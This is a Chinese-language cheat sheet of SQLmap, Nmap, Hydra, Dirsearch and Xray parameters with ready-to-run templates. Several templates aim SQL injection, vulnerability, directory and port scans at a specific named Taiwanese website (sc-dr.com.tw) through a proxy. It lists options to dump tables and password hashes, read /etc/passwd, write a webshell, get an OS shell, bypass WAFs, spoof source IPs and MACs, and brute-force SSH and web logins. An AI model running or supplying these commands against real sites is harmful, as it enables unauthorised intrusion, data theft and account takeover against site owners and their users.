一、SQLmap(注入专用,完整复刻之前深度结构)
1. 请求定位参数
表格
| 参数 | 功能说明 |
|---|---|
-u "URL" |
指定 GET 注入目标地址 |
-r req.txt |
加载抓包文件,适配 POST 复杂请求,替代 - u |
-p 参数名 |
锁定单个注入参数,多参数逗号分隔-p id,type |
--cookie="k=v" |
携带 Cookie,用于 Cookie 型注入 |
--random-agent |
随机 UA 防封禁拦截 |
--referer="url" |
自定义来路 Referer 请求头 |
--headers="X-Forwarded-For:127.0.0.1" |
自定义额外请求头 |
2. 扫描强度 & 合规安全(SRC 必配)
表格
| 参数 | 功能说明 |
|---|---|
--batch |
全自动应答 y/n,无需手动交互 |
--level 3 |
扫描等级 1-5,3 覆盖 GET/POST/Cookie/ 请求头 |
--risk 2 |
风险等级 1-3,仅查询、写入载荷,无删库破坏操作 |
--threads=3 |
3 低速线程,不压垮服务器,平台审核友好 |
--time-sec=8 |
时间盲注延迟 8 秒,减少网络误判 |
--delay=0.5 |
发包间隔 0.5s,极致低速规避 WAF |
--no-privileges |
禁止自动数据库提权,降低恶意判定 |
--no-multi |
关闭堆叠多语句 SQL,杜绝删改数据风险 |
3. 网络环境适配(境外 / HTTPS / 代理)
表格
| 参数 | 功能说明 |
|---|---|
--proxy=http://127.0.0.1:7890 |
HTTP 代理访问境外站点 |
--proxy=socks5://127.0.0.1:1080 |
SOCKS5 代理 |
--timeout=10 |
请求超时 10 秒,适配慢响应海外服务器 |
--ignore-ssl-errors=true |
忽略 HTTPS 证书过期、自签报错 |
4. 注入类型手动控制
表格
| 参数 | 功能说明 |
|---|---|
--technique=BEUSTQ |
指定注入类型:B 布尔 / E 报错 / U 联合 / S 堆叠 / T 时间 / Q 内联;例--technique=BE只跑报错 + 布尔 |
--union-cols=10 |
联合查询手动设置字段数,自动探测失效使用 |
5. WAF 绕过
表格
| 参数 | 功能说明 |
|---|---|
--tamper=脚本1,脚本2 |
载荷变形绕过,常用脚本:space2comment、randomcase、unmagicquotes、charencode、equaltorlike |
6. 数据库数据读取指令
表格
| 参数 | 功能说明 |
|---|---|
--dbs |
枚举全部数据库名称 |
-D 库名 --tables |
查询指定库内所有数据表 |
-D 库名 -T 表名 --dump |
导出整张表完整数据 |
--current-user |
查看数据库连接账号 |
--password |
读取数据库账号密码哈希 |
--sql-shell |
交互式 SQL 终端,手动执行语句 |
7. 高权限文件 / 系统操作(仅授权环境)
表格
| 参数 | 功能说明 |
|---|---|
--file-read="/etc/passwd" |
读取服务器本地敏感文件 |
--file-write="本地文件" --file-dest="/www/shell.php" |
写入 Webshell 木马 |
--os-shell |
获取服务器系统交互式命令行 |
8. 日志缓存存证(漏洞报告)
表格
| 参数 | 功能说明 |
|---|---|
-o |
精简优化日志输出 |
--output-dir="./scan_log" |
日志、返回包、dump 数据统一存入文件夹 |
--dump-format=csv |
数据表导出为 CSV 格式 |
--flush-session |
清空历史缓存,全新重扫 |
--session="session.txt" |
保存扫描会话,中断后续跑 |
实战模板(台湾站点 GET 注入)
bash
python sqlmap.py -u "http://sc-dr.com.tw/content-detail.php?type=3&id=8589" -p id --batch --random-agent --level 3 --risk 2 --threads=3 --time-sec=8 --timeout=10 --proxy=http://127.0.0.1:7890 --ignore-ssl-errors=true --output-dir="./scdr_log" --no-privileges二、Nmap 端口 & 资产扫描(完整扩充全量常用参数)
1. 目标与存活探测
表格
| 参数 | 功能说明 |
|---|---|
192.168.1.1 / domain.com |
单 IP / 域名扫描 |
192.168.1.0/24 |
扫描整个 C 段网段 |
-iL ip_list.txt |
批量加载 IP 列表 |
-sn |
仅存活 Ping 探测,不扫描端口 |
-Pn |
强制跳过存活检测,防火墙禁 Ping 必加 |
-PE |
标准 ICMP Ping |
-PS80,3306 |
TCP SYN Ping,向开放常用端口探测存活 |
-PU53 |
UDP Ping(DNS/SNMP) |
-n |
关闭 DNS 反向解析,大幅提速;-R强制反向解析 |
--dns-servers 8.8.8.8 |
自定义解析 DNS 服务器 |
2. TCP 扫描模式(隐蔽度区分)
表格
| 参数 | 功能说明 |
|---|---|
-sS |
半开 SYN 扫描(root 权限,痕迹轻、速度快) |
-sT |
全连接 TCP 扫描(无 root 默认使用,日志完整) |
-sA |
ACK 扫描,判断防火墙过滤规则 |
-sN/-sF/-sX |
空标志 / FIN/Xmas 隐蔽扫描,绕过简单防火墙 |
-sW |
窗口扫描,依靠 TCP 窗口判断端口开闭 |
3. 端口自定义配置
表格
| 参数 | 功能说明 |
|---|---|
-p 80,443,3306 |
指定单独端口 |
-p 1-1000 |
端口区间扫描 |
-p- |
全端口 1~65535 扫描 |
--top-ports=20 |
仅扫描 20 个最高危常用端口 |
-F |
快速精简端口列表,速度更快 |
--exclude-ports 135,445 |
排除指定 Windows 高危端口 |
--exclude 192.168.1.10 |
网段扫描排除单个 IP |
-p U:53,T:80 |
区分 UDP/TCP 端口扫描 |
4. 版本、系统、脚本探测
表格
| 参数 | 功能说明 |
|---|---|
-sV |
开启服务版本识别 |
-O |
操作系统指纹识别 |
-A |
全能组合:-O -sV --script=vuln,discovery --traceroute |
--script=vuln |
漏洞 CVE 检测脚本库 |
--script=auth |
弱口令爆破脚本 |
--script=discovery |
目录、子域名、后台路径探测 |
--script=单个CVE |
--script=http-vuln-cve2017-5638单独漏洞检测 |
--script-args user=admin,pass=123 |
给爆破脚本传入账号密码参数 |
--script-trace |
打印脚本完整收发数据包 |
--script-updatedb |
更新 nmap 脚本库 |
--script=!vuln |
排除某一类脚本 |
5. 速度、并发、超时精细调控
表格
| 参数 | 功能说明 |
|---|---|
-T0~T5 |
速度档位:T0/T1 极隐蔽;T2 合规 SRC 首选;T3 默认;T4/T5 高速暴力易封 IP |
--min-hostgroup=2 --max-hostgroup=5 |
并行扫描主机数量限制 |
--min-parallelism=1 --max-parallelism=10 |
端口探测并发限制 |
--max-rtt-timeout=2000ms |
数据包往返超时,境外调大数值 |
--host-timeout=10s |
单主机扫描 10 秒无结果直接跳过 |
6. 防火墙 / WAF 伪装绕过
表格
| 参数 | 功能说明 |
|---|---|
-f |
8 字节数据包分片;--mtu 16自定义分片(必须 8 倍数) |
-D IP1,IP2,ME |
诱饵 IP 扫描,ME 为本机真实 IP |
-S 伪造IP -e eth0 |
伪造源 IP 发包 |
--src-port 53 |
伪装 DNS 源端口 |
--spoof-mac 00:11:22:33:44:55 |
伪造 MAC 地址(内网欺骗) |
--randomize-hosts |
打乱主机扫描顺序,规避批量探测识别 |
7. 输出日志与筛选
表格
| 参数 | 功能说明 |
|---|---|
-oN scan.txt |
标准文本日志 |
-oX scan.xml |
XML 格式,可导入漏洞平台工具 |
-oG grep.txt |
grep 单行格式,方便管道筛选开放端口 |
-oS report.html |
可视化 HTML 报告 |
-v / -vv |
详细 / 超详细输出;-d调试模式 |
--open |
只打印开放端口,过滤 closed/filtered |
--stats 10 |
每 10 秒输出扫描进度 |
8. 拓展特殊功能
表格
| 参数 | 功能说明 |
|---|---|
-6 |
启用 IPv6 资产扫描 |
--traceroute |
路由追踪,定位防火墙边界节点 |
-V/--version |
查看 Nmap 版本 |
-h |
完整帮助文档 |
合规低速扫描模板
bash
nmap -Pn -T2 -sV --script=vuln,discovery --max-rtt-timeout=2000ms --open sc-dr.com.tw -oG nmap_log.txt三、Hydra 弱口令爆破工具
1. 基础账号密码配置
表格
| 参数 | 功能说明 |
|---|---|
-l admin |
单个固定用户名 |
-L user.txt |
加载用户名字典文件 |
-p 123456 |
单个固定密码 |
-P pass.txt |
加载密码字典文件 |
ssh://ip / ftp://ip / mysql://ip |
协议 + 目标 IP,支持 ssh/ftp/mysql/mssql/rdp/http-form |
2. Web 表单 POST 爆破专属
表格
| 参数 | 功能说明 |
|---|---|
http-post-form |
POST 表单爆破模式 |
"/login.php:user=^USER^&pwd=^PASS^:F=密码错误" |
格式:页面:参数占位符:失败提示关键词 |
3. 线程、输出、多目标
表格
| 参数 | 功能说明 |
|---|---|
-t 4 |
并发线程 4,低速防账号锁定 |
-vV |
打印每一条爆破尝试详情 |
-o ok.txt |
导出爆破成功账号密码 |
-s 3306 |
手动指定非默认服务端口 |
-M ip_list.txt |
批量多 IP 同时爆破 |
模板示例
bash
# SSH爆破
hydra -L user.txt -P pass.txt -t 4 -vV -o ssh_success.txt ssh://192.168.1.1
# 网站登录表单
hydra -L user.txt -P pass.txt -t 4 http-post-form "/login.php:username=^USER^&password=^PASS^:F=登录失败" 127.0.0.1四、Dirsearch 目录 / 备份文件扫描
1. 目标、字典、后缀
表格
| 参数 | 功能说明 |
|---|---|
-u https://xxx.com |
单个目标 URL |
-l url.txt |
批量 URL 列表 |
-w dict.txt |
自定义目录字典 |
-e php,html,txt,bak,sql,zip |
扫描文件后缀,备份文件重点探测 |
2. 防封禁限速配置
表格
| 参数 | 功能说明 |
|---|---|
-t 8 |
并发线程 8,公网不建议超过 10 |
--delay=0.3 |
每次请求间隔 0.3 秒 |
--random-agent |
随机浏览器 UA |
3. 身份认证携带
表格
| 参数 | 功能说明 |
|---|---|
--cookie="PHPSESSID=xxxx" |
携带登录 Cookie 扫描授权后台 |
-H "Authorization: Basic YWRtaW46MTIz" |
基础认证请求头 |
4. 过滤、结果输出
表格
| 参数 | 功能说明 |
|---|---|
-x 404,403 |
过滤 404、403 状态码,只展示有效页面 |
-o dir_result.txt |
保存扫描结果 |
--full-url |
输出完整可访问 URL 链接 |
实战模板
bash
python3 dirsearch.py -u http://sc-dr.com.tw -e php,bak,sql,zip -t 8 --random-agent -o dir_log.txt -x 404,403五、Xray 综合漏洞扫描器(国内挖洞主流)
1. 扫描模式与目标
表格
| 参数 | 功能说明 |
|---|---|
webscan --url http://xxx.com |
单站点 Web 漏洞扫描 |
webscan --list urls.txt |
批量 URL 扫描 |
servicescan 192.168.1.1 |
端口服务漏洞探测 |
2. 扫描强度与插件控制
表格
| 参数 | 功能说明 |
|---|---|
--level 3 |
扫描等级 1~5,3 平衡检出率与速度 |
--risk 2 |
风险等级,无破坏性攻击载荷 |
--plugins sqli,xss,upload,ssrf |
仅启用指定漏洞插件 |
3. 网络、代理、伪装
表格
| 参数 | 功能说明 |
|---|---|
--proxy http://127.0.0.1:7890 |
代理访问境外站点 |
--cookie "PHPSESSID=xxx" |
全局携带 Cookie |
--ua "Mozilla/5.0 Chrome" |
自定义 UA 头 |
--delay 300 |
发包间隔 300 毫秒,防 WAF 拦截 |
4. 漏洞报告输出
表格
| 参数 | 功能说明 |
|---|---|
--html report.html |
生成可视化 HTML 漏洞报告 |
--json result.json |
结构化 JSON 数据,方便归档 |
站点扫描模板
bash
xray webscan --url http://sc-dr.com.tw --level 3 --risk 2 --proxy http://127.0.0.1:7890 --html xray_report.html